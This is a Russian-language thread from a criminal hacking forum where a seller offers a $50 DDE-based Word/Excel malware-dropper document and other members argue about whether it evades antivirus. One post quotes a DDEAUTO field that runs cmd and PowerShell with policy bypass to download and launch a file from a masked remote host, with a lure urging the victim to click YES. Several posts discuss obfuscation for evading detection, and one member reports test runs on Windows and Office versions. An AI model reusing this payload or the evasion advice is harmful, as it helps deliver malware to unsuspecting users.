video pls...
-
XSS.stack #1 – первый литературный журнал от юзеров форума
EXE + WORD,EXCEL exploit
- Автор темы zetmoux
- Дата начала
Да нет же, ты что то путаешь дядь) Ты мне в пм написал сходу
Толи ты попутал к кому обращаешься толи еще что-то, но мысль я потерял)) я предложил ТСу затестить его док, каким образом и причем тут ты я вообще не понял, подумал что ты предлагаешь потестить билд, и дал тебе ответ что я как бы готов в любое время)) где заканчивается эта логическая цепочка непонятно, какое вообще отношение ты имешь к ТС и тестам тоже, и в чем твоя предьява я как бы тоже не понял. В личку я тебе ответил на твою мессагу по поводу теста. Вообщем толи вышло какое то недопонимание, толи это ты забыл перелогиниться)))) Вопрос остается открытый, если тест дока нужен - без проблем сделаю. Репутации есть на других площадках, на мф в том числе. Я так понял, что цитата выше - предназначалась для ТС, но каким то образом ты отправил ее мне, откуда и пошло все недопонимание... Макрос за 20 баксов это сказка, люди делают по 200 и сделать не могут, обойти деф с включенным инетом щас очень сложно, а тут какой то гений прям, по 20 баксов билды продает да еще и с ДДЕ)))))))) Чудес не бывает, но затестить можно, 500 оплачу если вдруг у ТС чистый ДДЕ Док.
Толи ты попутал к кому обращаешься толи еще что-то, но мысль я потерял)) я предложил ТСу затестить его док, каким образом и причем тут ты я вообще не понял, подумал что ты предлагаешь потестить билд, и дал тебе ответ что я как бы готов в любое время)) где заканчивается эта логическая цепочка непонятно, какое вообще отношение ты имешь к ТС и тестам тоже, и в чем твоя предьява я как бы тоже не понял. В личку я тебе ответил на твою мессагу по поводу теста. Вообщем толи вышло какое то недопонимание, толи это ты забыл перелогиниться)))) Вопрос остается открытый, если тест дока нужен - без проблем сделаю. Репутации есть на других площадках, на мф в том числе. Я так понял, что цитата выше - предназначалась для ТС, но каким то образом ты отправил ее мне, откуда и пошло все недопонимание... Макрос за 20 баксов это сказка, люди делают по 200 и сделать не могут, обойти деф с включенным инетом щас очень сложно, а тут какой то гений прям, по 20 баксов билды продает да еще и с ДДЕ)))))))) Чудес не бывает, но затестить можно, 500 оплачу если вдруг у ТС чистый ДДЕ Док.
Я ответил тебе на твой комментарий )
Ответил тем : что ТС морозиться в ЛС )
Потом погрёб писать ему второй раз , по поводу теста .
Но каким то образом моё второе сообщение про тест - попало в твою личку.
Я допускаю что ответив тебе я по невнимательности нажал на твой же акк ,
и начал писать месседж который предназначался ТС-у )
Ну как вариант - пусть буду я невнимателен )
Страшного же ни чего не произошло )
Вообщем бывает )
Но сути не меняет - ТС предложил тест и морозится..
Это должно настораживать потенциальных клиентов.
Ответил тем : что ТС морозиться в ЛС )
Потом погрёб писать ему второй раз , по поводу теста .
Но каким то образом моё второе сообщение про тест - попало в твою личку.
Я допускаю что ответив тебе я по невнимательности нажал на твой же акк ,
и начал писать месседж который предназначался ТС-у )
Ну как вариант - пусть буду я невнимателен )
Страшного же ни чего не произошло )
Вообщем бывает )
Но сути не меняет - ТС предложил тест и морозится..
Это должно настораживать потенциальных клиентов.
Ну вот и подьяснились, у всех бывает бро, ничего критично не произошло если чем задел извиняй) По факту да, ТС очередной пиздабол, в чем я был изначально уверен, по той простой причине, что никто не продаст ДДЕ на док, да еще и чистый, да еще и за 50 баксов) Мона закрывать эту шнягу, а то тут нормальные пацаны на нервах уже друг на друга нападают ?
- Автор темы
- Добавить закладку
- #26
палиться всего 4 ноунейм антивирусами
пиши в лс клоун, сделаю тебе док, посмотрим кто пиздабол
Вложения
Очень умно слить на вирустотал )
ЛОЛ, чистый это когда чистый, а не когда светится 4 АВ, тем более ноунеймами. На вирустотал это сильно конечно.. Ты свой док запусти на реальной тачке на вин10 с последними обновлениями и включенным интернетом, и посмотри, что тебе на это виндеф скажет, клоун.
Последнее редактирование:
док с фрейм доком. фрейм и не палится.
а грузит в фрейме стандартный дде
DDE " DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('hXXp://XXXXXXXXX/sport/rockstar.php','rockstar.php'); start 'rockstar.php' # " "for security reasons click YES"" "doc" ""
там показано какой док он грузит, не буду тут ссылку на него осталвлять наверно. но вот его вирустотал.
22/63, мега чистый дде))
а грузит в фрейме стандартный дде
DDE " DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('hXXp://XXXXXXXXX/sport/rockstar.php','rockstar.php'); start 'rockstar.php' # " "for security reasons click YES"" "doc" ""
там показано какой док он грузит, не буду тут ссылку на него осталвлять наверно. но вот его вирустотал.
22/63, мега чистый дде))
Последнее редактирование:
Уважаемый автор, я не предлагал сделать скриншот. Я просил озвучит уязвимости, которые использует ваш метод обработки. Так же я ничего не писал про обнаружение АВ.
Эх, в целом всё ясно.
Эх, в целом всё ясно.
Всем доброго времени.
Получил у ТС-а его чудосклейку.
*****************
1 - Исходные данные :
Windows 7 Максимальная 32 бита.
MS Office 2003 Pro RUS
Нет антивируса , отключен защитник.
Идёт подкачка нового ворда с хостинга ТС-а с именем payload-final.docx
И на этом , собственно , ВСЁ.
Открытие файла НЕ произошло .
**********************************************************
2 - Исходные данные :
Windows 7 Максимальная 32 бита.
Office 2007 Enterprise
Нет антивируса , отключен защитник.
Всё тоже самое что и выше +
Естественно везже жамкал : ДА и ОК .
**************************
3 - Исходные данные :
Windows 7 Максимальная 64 бита.
Office 2007 Enterprise
Нет антивируса , отключен защитник.
Всё тоже самое что и выше
**************************************
4 - Исходные данные :
Windows 7 Максимальная 32 бита.
Microsoft Office профессиональный плюс 2019
Нет антивируса , отключен защитник.
*****************************
Я уже и архиватором открывал )
И текстовым редактором :
И даже ,блЕд , паинтом открыл !
Ну не хочет оно запускать зверя , ну ни в какую.
ТС - я что то не так делал ?
Получил у ТС-а его чудосклейку.
*****************
1 - Исходные данные :
Windows 7 Максимальная 32 бита.
MS Office 2003 Pro RUS
Нет антивируса , отключен защитник.
Идёт подкачка нового ворда с хостинга ТС-а с именем payload-final.docx
И на этом , собственно , ВСЁ.
Открытие файла НЕ произошло .
**********************************************************
2 - Исходные данные :
Windows 7 Максимальная 32 бита.
Office 2007 Enterprise
Нет антивируса , отключен защитник.
Всё тоже самое что и выше +
Естественно везже жамкал : ДА и ОК .
**************************
3 - Исходные данные :
Windows 7 Максимальная 64 бита.
Office 2007 Enterprise
Нет антивируса , отключен защитник.
Всё тоже самое что и выше
**************************************
4 - Исходные данные :
Windows 7 Максимальная 32 бита.
Microsoft Office профессиональный плюс 2019
Нет антивируса , отключен защитник.
*****************************
Я уже и архиватором открывал )
И текстовым редактором :
И даже ,блЕд , паинтом открыл !
Ну не хочет оно запускать зверя , ну ни в какую.
ТС - я что то не так делал ?
да это блеать было очевидно как бы с первого поста. Чудес не бывает пацаны, расходимся
DDE уязвимость за 50$ рассмешил чел конечно, там наложи любую обускацию и будет тебе фуд и будет тебе счастье, хоть бы чуть чуть погуглил поцан перед тем что бы что-то продавать, а ваши саные макросы с 5 детектов после залива на вт становятся 40? и чему я удивляюсь?
UNC пути причем корявые + dde attack и это за 50$ kek
2019 надо поставить галочку на внешние содержимое вроде а так не откроет dde
Тогда уж сразу - запустить exe , что стесняться то ? )
О чём речь в начале поста ?
-- Правильно , стало быть с меня exe и 50 зелёных денег , с ТС-а то , за что он просил 50 зелёных денег .
Когда подобные темы всплывают - я себя ставлю на место ламеро/юзера.
при установки софта - тупо жму:далее-далее.. окей.. согласен ...
всякие там галочки на внешнее содержимое и прочие dde-----ихь ферштее нихть !
Или вы юзеру напишите в месседже : скачай поставь галочку , отключи авиря и будет тибе щастье ?
corpserves - ни чего личного !